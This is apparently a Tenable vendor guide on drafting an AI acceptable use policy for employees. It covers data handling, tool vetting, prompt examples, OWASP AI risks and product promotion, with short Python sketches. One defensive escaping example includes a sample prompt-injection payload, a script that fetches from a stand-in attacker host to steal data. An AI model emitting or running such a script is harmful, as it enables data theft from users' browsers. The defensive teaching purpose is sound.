What is an AI acceptable use policy (AUP)?
Last updated: October 29, 2025
Protect your organization from unsanctioned AI
An AI acceptable use policy is a crucial set of rules that governs and guides employee use of generative AI tools and agents to help your organization balance innovation with protecting sensitive company data.
Key takeaways
- An AI acceptable use policy is key to managing the cyber exposure created by unmanaged or "shadow" AI tools.
- Key policy elements must include scope, clear data handling rules, and a curated list of authorized tools.
- Integrating security for AI principles from frameworks like the OWASP Top 10 for Large Language Model (LLM) Applications and OWASP Agentic AI Governance is critical for a robust policy.
- A clear governance process for vetting and approving new AI tools prevents future security gaps.
Explore key concepts
- Why every organization needs an AI acceptable use policy — now
- 5 essential elements of a generative AI policy
- Safe usage in practice: Examples and scenarios
- Integrating security for AI into your policy
- How to create your AI AUP: A 4-step guide
- Making the case for an AI AUP to leadership
- Frequently asked AI AUP questions
- Getting started with your AI AUP
- AI AUP resources
- AI AUP products
Why every organization needs an AI acceptable use policy — now
An AI acceptable use policy (AI AUP) is a formal set of rules that defines how employees can use generative artificial intelligence (AI) tools and services.
As your teams explore AI platforms like ChatGPT and others to boost creativity and efficiency, they can also unintentionally create new risks. Without clear guidelines, employees might input sensitive intellectual property, customer data, or internal credentials into public AI models and create significant cyber exposure for your organization.
An effective policy for acceptable AI use creates guardrails for your organization to innovate safely. It establishes clear do's and don'ts, protects company assets, and creates a formal process for vetting new technologies. An AI user policy defines permitted and prohibited uses, outlines required data-handling safeguards, specifies who may access which tools, and sets the approval and onboarding process for new AI technologies.
A strong AI user policy is a foundational part of your overall cybersecurity strategy. It’s also the starting point for securing AI across your enterprise.
See how the Tenable One Exposure Management Platform can help you manage your full AI exposure and risks.
5 essential elements of a generative AI policy
A strong AI use policy is clear, comprehensive and easy for everyone to understand. It replaces ambiguity with well-defined rules that protect your employees and your organization. While you can tailor your policy to your specific industry and risk appetite, you should build your generative AI acceptable use policy based on these five essential pillars.
1. Scope and roles
This section defines who and what the policy covers. It should clearly state which employees, departments, and business environments must adhere to the rules. It also assigns responsibility, outlining the duties of employees, managers, and the AI governance team (e.g., CIO, legal, InfoSec) to ensure accountability. Clarifying scope and roles is a key part of any AI policy for employees.
2. Authorized tools and prohibited use cases
You should maintain a curated list of approved AI tools and agents that your security and legal teams have vetted. This section should also include concrete examples of forbidden activities, such as using unapproved AI platforms or using AI for activities that are illegal, unethical, or violate company standards.
3. Data handling and privacy rules
Data handling and privacy rules are among the most critical components of your AI AUP. You must explicitly define which types of data employees must never input into public AI tools, including personally identifiable information (PII), protected health information (PHI), intellectual property, source code, and corporate financial data. Provide clear guidance on when and how to use data masking or anonymization techniques.
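To make the masking guidance concrete, here is a minimal Python sketch of prompt redaction. The regex patterns and the `redact_prompt` helper are illustrative assumptions, not a complete PII solution; real deployments typically pair policy with dedicated data loss prevention (DLP) tooling.

```python
import re

# Illustrative patterns only; a production policy would rely on vetted DLP tooling.
PII_PATTERNS = {
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}

def redact_prompt(prompt: str) -> str:
    """Replace likely PII with placeholders before a prompt leaves the company."""
    for label, pattern in PII_PATTERNS.items():
        prompt = pattern.sub(f"[{label.upper()} REDACTED]", prompt)
    return prompt

if __name__ == "__main__":
    raw = "Summarize this ticket from jane.doe@example.com, SSN 123-45-6789."
    print(redact_prompt(raw))
    # -> "Summarize this ticket from [EMAIL REDACTED], SSN [SSN REDACTED]."
```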
4. The governance and change process
Your employee use policy for AI should evolve as quickly as AI technologies do. This section details the workflow for how employees can request a new AI tool for review and authorization. It should also outline the decision criteria your governance team will use to approve or reject a tool, such as its data security protocols, privacy policy, vendor stability, and data residency.
Key vetting criteria for new AI tools
- Security protocols
- Review the vendor’s security posture.
- Do they have certifications like SOC 2?
- How do they encrypt data in transit and at rest?
- What are their vulnerability management and incident response processes?
- Data privacy policy
- Understand how the vendor handles your data.
- Does their policy explicitly state how they support compliance with regulations relevant to your business, such as HIPAA, PCI DSS, etc.?
- Critically, does the vendor use customer prompts and inputs to train its models?
- Can you opt out?
- What are the vendor’s data retention policies?
- Vendor stability
- The AI market is volatile. Ask your team: what’s the business risk of relying on an unvetted new AI tool?
- Consider the vendor’s funding, market reputation, and long-term viability before integrating it into critical workflows.
- Data residency
- Know where the vendor stores and processes your data geographically, which is essential for complying with regulations like GDPR and CCPA.
- Ensure the vendor’s data centers are in regions that meet your compliance requirements.
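To apply these criteria consistently, a governance team could encode each review as a structured record. The Python sketch below is a hypothetical illustration; the `AIToolReview` class, its field names, and the simplified pass/fail rule are assumptions, not a prescribed standard.

```python
from dataclasses import dataclass, field

@dataclass
class AIToolReview:
    """Hypothetical record of a vendor review against the criteria above."""
    tool_name: str
    soc2_certified: bool
    encrypts_in_transit_and_at_rest: bool
    trains_on_customer_data: bool
    training_opt_out_available: bool
    data_regions: list[str] = field(default_factory=list)
    approved_regions: list[str] = field(default_factory=list)

    def passes_vetting(self) -> bool:
        # Simplified decision rule: security basics in place, no training on
        # customer data (or an opt-out exists), and data stays in approved regions.
        training_ok = (not self.trains_on_customer_data) or self.training_opt_out_available
        residency_ok = all(region in self.approved_regions for region in self.data_regions)
        return (self.soc2_certified
                and self.encrypts_in_transit_and_at_rest
                and training_ok
                and residency_ok)

review = AIToolReview(
    tool_name="ExampleAI",
    soc2_certified=True,
    encrypts_in_transit_and_at_rest=True,
    trains_on_customer_data=True,
    training_opt_out_available=True,
    data_regions=["eu-west-1"],
    approved_regions=["eu-west-1", "us-east-1"],
)
print(review.passes_vetting())  # True under this simplified rule
```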
5. Safe use
Finally, the policy should focus on key principles of safe AI use and serve as a bridge to practical, day-to-day examples of safe versus risky prompting. It reinforces the core message that employees must always verify AI-generated content is accurate and that each team member is ultimately responsible for their own work.
Safe usage in practice: Examples and scenarios
A policy is only effective if your employees can apply it to their daily work. To make the rules clear, provide concrete examples that illustrate safe versus unsafe AI prompting behavior. Doing so translates abstract principles like "protect company data" into actionable guidance for different roles across your organization.
A quick checklist of AI use do's and don'ts
Use this checklist as a starting point for employee training and internal communications:
- DO verify the accuracy of all AI-generated content before using it.
- DO use approved, company-vetted AI tools for all work-related tasks.
- DO anonymize any business data you use in prompts whenever possible.
- DON'T input any customer PII, employee data, or confidential company intellectual property into public AI tools.
- DON'T use AI to create content that is harassing, discriminatory, or violates company policy.
- DON'T present AI-generated content as your own original work without proper review and modification.
Role-based examples: Safe vs. unsafe prompts
AI tool choice vs. prompt safety
The examples below demonstrate how to write safe prompts for public or general-use AI tools. However, for highly sensitive data (like source code, non-public financials, or PII), prompt phrasing alone is not the solution; the data itself is the exposure risk.
Your employees should never enter proprietary data into a public AI tool.
For this type of data, you must use a company-approved, secure solution, such as an internal LLM (e.g., a self-hosted model) or a secure enterprise platform (like ChatGPT Enterprise) that explicitly guarantees it does not use your data for training and is not accessible outside your organization's instance.
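As a minimal illustration of this routing rule, the hypothetical sketch below sends any prompt flagged as sensitive to an approved internal endpoint only. The `contains_sensitive_data` keyword heuristic and the endpoint URLs are illustrative assumptions; production controls would rely on proper DLP classification.

```python
# Hypothetical routing sketch: keep sensitive prompts on approved infrastructure.
INTERNAL_ENDPOINT = "https://llm.internal.example.com"   # assumed self-hosted model
PUBLIC_ENDPOINT = "https://api.public-ai.example.com"    # assumed public tool

SENSITIVE_MARKERS = ("confidential", "customer list", "source code", "ssn")

def contains_sensitive_data(prompt: str) -> bool:
    """Naive keyword heuristic; real controls would use DLP classification."""
    lowered = prompt.lower()
    return any(marker in lowered for marker in SENSITIVE_MARKERS)

def choose_endpoint(prompt: str) -> str:
    """Route sensitive prompts to the company-approved internal LLM only."""
    return INTERNAL_ENDPOINT if contains_sensitive_data(prompt) else PUBLIC_ENDPOINT

print(choose_endpoint("Draft a public blog post about cloud security trends."))
print(choose_endpoint("Review this confidential source code for bugs."))
```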
- Scenario for marketing
- Unsafe prompt: "Analyze this attached list of our top 100 customer email addresses and sales data from Q3 to identify new marketing campaign ideas."
- Safe prompt: "Our company sells cybersecurity software to IT managers in the financial services industry. Based on public information, suggest three marketing campaign ideas that would appeal to this audience."
- Scenario for HR
- Unsafe prompt: "Review this attached resume from Jane Doe and her performance review data to write a job description for a similar role."
- Safe prompt: "Write a job description for a senior software engineer. The role requires five years of experience with Java, cloud security knowledge, and strong communication skills. The position is remote."
Integrating security for AI into your policy
A comprehensive acceptable use policy for AI governs user behavior, but it's only one half of the equation.
Your policy should also connect to your broader strategy for security for AI: the technical measures you use to protect the AI models and infrastructure themselves.
This approach ensures you are holistically managing human-based and technology-based risks. By referencing technical security standards within your policy, you align your entire organization around a common set of goals for secure AI adoption.
Addressing the top AI security risks
Your acceptable use policy for AI should acknowledge the underlying technical vulnerabilities inherent in AI systems.
The OWASP Top 10 for LLMs is an excellent framework for understanding these current threats. Yet, as AI evolves from simple models to autonomous "agentic" systems (or AI agents), the new OWASP Agentic AI Security project is becoming the critical standard for future risks.
Risks like prompt injection, data leakage, and insecure output handling can expose your organization to attacks, even if employees follow the rules. Your policy should state your organization must vet all new tools against these known and emerging AI security risks.
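To make one of these risks concrete, the sketch below shows a simple mitigation for insecure output handling: treating model output as untrusted data and escaping it before rendering. This is a minimal, hypothetical example, not a complete defense; real applications layer input filtering, output validation, and least-privilege design.

```python
import html

def render_ai_answer(model_output: str) -> str:
    """Treat model output as untrusted: escape it before embedding in HTML.

    This mitigates insecure output handling, where a prompt injection causes
    the model to emit script tags or markup that the app would then render.
    """
    return f"<div class='ai-answer'>{html.escape(model_output)}</div>"

# A prompt-injection attempt that tries to smuggle script into the page:
malicious_output = "Sure! <script>fetch('https://attacker.example/steal')</script>"
print(render_ai_answer(malicious_output))
# The script tag is rendered inert: &lt;script&gt;...&lt;/script&gt;
```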
Effectively managing these risks requires visibility into how your organization uses AI and where it creates potential exposures. Solutions like Tenable AI Exposure can help you discover and assess the use of AI systems across your environment, so you have insight to enforce your AI use policy and secure your infrastructure.
How to create your AI AUP: A 4-step guide
Putting your AI use policy into practice requires a cross-functional effort to ensure the rules are practical, well-understood, and have consistent enforcement.
Follow this four-step process to build and implement an effective acceptable AI use policy for your organization.
Step 1: Assemble your AI governance team
First, identify the key stakeholders who will own your AI acceptable use policy. This team is typically a partnership between IT/security, legal, HR, and representatives from key business units.
This group will be responsible for drafting the policy, vetting new tools, and handling exceptions.
Designating a clear point of contact is crucial for employees who have questions or need to submit a new tool for review.
Step 2: Draft the AI policy using this guide
Using the essential elements outlined above, draft an initial version of your AI use policy. The goal is to be clear and direct and avoid overly technical jargon that might confuse non-technical employees.
Plain language is the key to writing an AI policy that people will actually read. Focus on actionable guidance that helps your teams make smart decisions while using AI.
Step 3: Establish the new AI tool request process
Define and document the formal process for how an employee can request a new AI tool. This workflow should clearly state what information your review team needs for a submission (e.g., the tool’s purpose, its vendor, and a link to its security and privacy policies) and what the service-level agreement (SLA) is to get a decision from the governance team.
For example, your process could involve one of the following (a structured intake record is sketched after this list):
- Submit a ticket through your standard IT service portal with a special "AI Tool Review" category.
- Fill out a standardized form on your intranet that captures all the required information for the governance team.
- Send an email to a dedicated alias, such as [email protected].
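If your service portal supports structured tickets, the submission itself can be captured as a simple record. The Python sketch below is a hypothetical intake schema; the `AIToolRequest` fields mirror the submission requirements described above but are assumptions, not a standard.

```python
from dataclasses import dataclass

@dataclass
class AIToolRequest:
    """Hypothetical intake record mirroring the submission requirements above."""
    requester_email: str
    tool_name: str
    vendor: str
    business_purpose: str
    security_policy_url: str
    privacy_policy_url: str

request = AIToolRequest(
    requester_email="employee@example.com",
    tool_name="ExampleAI Assistant",
    vendor="ExampleAI Inc.",
    business_purpose="Summarize public market research for the sales team",
    security_policy_url="https://exampleai.example/security",
    privacy_policy_url="https://exampleai.example/privacy",
)
print(f"Review requested for {request.tool_name} ({request.vendor})")
```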
Step 4: Communicate and educate your employees
Once you’ve finalized your policy, get it in front of everyone. Conduct training sessions, post it where people actually look (not just buried somewhere in an intranet folder), and get your employees to sign your AI use policy acknowledgments. The real trick is keeping it relevant and engaging.
Want to dive deeper into AI security? Check out the Tenable blog.
Making the case for an AI AUP to leadership
Securing executive sponsorship is critical because it gives your AI use policy authority and ensures enforcement is a business-wide priority. You should frame the AI policy as a strategic enabler, not a restriction.
A clear employee policy for AI use accelerates safe AI adoption by replacing uncertainty with a clear framework for action. It removes employee guesswork for an approved pathway to innovate productively and with confidence.
A well-defined AI AUP directly reduces risk by:
- Preventing intellectual property leaks into public models
- Establishing clear accountability
- Ensuring AI tools are fully vetted for security and privacy risks before your employees use them widely
Gaining full visibility is the first step.
The Tenable One Exposure Management Platform gives your organization a unified view of your entire attack surface, including risks from new technologies like AI.
Enforcing your policy starts with knowing what's in your environment. Tenable helps you discover these shadow AI tools and agents. Products like Tenable AI Aware include plugins that detect the presence of popular AI and LLM tools, so you get visibility to apply your policy.
The Tenable Research team also actively discovers and discloses exposures in third-party AI software to help secure your entire ecosystem.
Frequently asked AI AUP questions
There are a lot of unanswered questions out there about AI, especially around acceptable use policies. We've compiled some of the most frequently asked questions and answered them clearly so you can establish your own policy with confidence.
1. What is the purpose of an AI acceptable use policy?
The main purpose of an AI acceptable use policy is to mitigate security and data privacy risks. It prevents employees from inputting confidential company data, intellectual property, or customer PII into public AI models to decrease your organization's exposure to data loss.
2. Who is responsible for creating an AI acceptable use policy?
Creating an AI use policy is typically a collaborative effort led by a governance team that includes representatives from IT/security, legal, and human resources, with input from key business departments.
3. How is an AI acceptable use policy different from a general IT acceptable use policy?
While a general IT policy covers broad technology use (email, internet, software), an AI-specific policy addresses the unique risks of generative AI, such as data privacy concerns with prompt inputs, intellectual property leakage, and the generation of inaccurate or biased information.
Getting started with your AI AUP
A comprehensive AI acceptable use policy helps your organization move fast with AI adoption without breaking things. It gives your teams the guardrails they need to experiment safely, keeps your crown jewels safe, and sets up an AI governance framework that'll actually scale.
You can use the framework and checklist in this guide as core components to create your own AI acceptable use policy template. Include, for example:
- Policy scope and responsibilities - Clearly defines who and what the AI use policy covers and assigns accountability.
- Approved AI tools and use restrictions - Lists all company-vetted AI technologies and outlines ways your employees should and should not use AI.
- Data protection and privacy standards - Creates clear rules that explain how to handle sensitive and confidential information.
- Guidelines for safe and responsible use - Offers practical advice and examples for day-to-day interactions with AI.
- Governance and new tool vetting process - Outlines the formal procedure for reviewing and approving new AI applications.
By turning these guidelines into policy and consistent practice, you transform AI from a source of risk into a business enabler and a core part of your security culture.
AI AUP resources
AI AUP products
- Tenable AI Exposure
- Tenable One